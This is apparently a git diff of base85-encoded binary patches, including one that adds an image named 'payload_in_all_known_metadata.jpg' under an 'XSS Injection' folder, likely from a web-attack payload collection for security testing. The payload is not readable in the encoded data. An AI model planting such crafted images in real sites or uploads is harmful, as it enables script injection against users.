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 XD__v$jklBsScnE3aXjVNsSE!DU{?H> literal 0 HcmV?d00001 
diff --git a/XSS Injection/Files/payload_in_all_known_metadata.jpg b/XSS Injection/Files/payload_in_all_known_metadata.jpg new file mode 100644 index 0000000000000000000000000000000000000000..43d7b6a70859a9a130918bb130ad5321b1e6b20f GIT binary patch literal 28581 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 